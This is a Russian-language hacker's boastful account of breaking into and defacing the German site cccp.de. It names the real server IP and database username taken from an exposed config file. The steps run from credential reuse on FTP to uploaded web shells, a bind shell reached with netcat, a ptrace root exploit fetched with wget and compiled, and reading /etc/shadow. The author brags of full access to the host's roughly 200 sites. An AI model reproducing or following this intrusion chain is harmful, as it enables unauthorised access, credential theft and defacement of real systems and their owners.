Одним ранним утром, нет одним прекрасным ранним утром, я сидел и бездельничал. Делать было нечего, и
от того решил я помучить Yandex: набрал в поисковике RusH security team и начал изучать сайты и их содержимое
(что мол о нас пишут). И тут я натыкаюсь на сайт
http://www.cccp.de, интересненько, что мы делаем на данном сайте? =) Зашёл, посмотрел, сайт в Германии, но на русском языке, мол для эмигрантов.
Немного посмотрев сайт, не найдя для себя чего-нибудь интересного, решил проверить так сказать на вшивость.
CGI-scanner показал немного за исключением одного момента:
http://www.cccp.de/config.inc 200 - [Found]
Опа, важная информация, но в последствии я очень удивился, когда открыв ссылку увидел следующее
<?
$server = "81.201.96.5";
$user = "vps01100";
$passwd = "*******";
?>
Это были логин и пароль для подключения к БД. На серваке стоял скуль, но подключившись в нему с этими данными я обломался, так как нифига интересного там не было =(
Недолго думая я пошёл на фтп - ftp://www.cccp.de - ввёл логин пасс =)
Подошло =)
На фтп был каталог /boerse = boerse.cccp.de и сам сайт cccp.de в папке www/cccp/. Так как первый нам не нужен
- я решил дефейсить второй. Состряпал дефейс, зашёл на фтп через
http://web2ftp.com - пытаюсь переименовать index.php в index_hacked.php, и опа
- не хватает прав... Пытаюсь поменять атрибуты
- не получается =( Попробовал с другими файлами
- такая же история. Иду в директорию /boerse/ и всё меняется, всё получается, но наша цель выше...
Залив в директорию подсайта скриптик remview.php
и phpshell.php (просмотр директорий и файлов) долго лазил в скриптах
в поисках различной инфы и нашёл несколько паролей, но всё было не к тому,
к чему надо...
Команда "uname -a" выдала, что мы имеем дело с линухом. Гы-гы-гы, линухи люблю =) Решил попробовать рутится через багу в ptrace, благо сплоит под рукой был, может не все админы слышали о этой баге? 😉 Но сплоит через http-шелл не запустишь, а к ssh логин и пароль для фтп не подходили =( Ну это дело поправимое =) Залил на фтп маленькую прогу, которая открывала порт и биндила его к /bin/bash, через phpshell.php, скомпилил, благо компилятор на серваке был, и запустил. Потом с шелла (c другого) запустил netcat: nc 81.201.96.5 50666 (где 50666 - порт который открыла прога ) и получил шелл на серваке. Осталось дело за малым ... порутится =) Заливаю сплоит wget
http://www.site.com/ptrace.c, компилю gcc -o ptrace ptrace.c и запускаю ./ptrace =) Ну что говорить? Админ про такую багу видимо не знал =) id выдает uid=0 gid=0 и я в нирване =)))
Ну дальше всё было делом техники - cat /etc/shadow. Получили пароли, расшифровывать ломало да и пароли там были достаточно сложные. Поэтому мы пошли более легким путем, используя привилегии суперюзера Вульф поменял атрибуты папки =).
Я по быстрому залил дефейс и добавил его на воид.ру =)
P.S. Сайт www.cccp.de хостится на немецком хостинге www.vpserver.de, на котором находится около 200 сайтов, это я к тому что из-за ошибки админов сайта www.cccp.de мы получили полный доступ к серверу хостера.
:RusH security team:
http://www.rsteam.net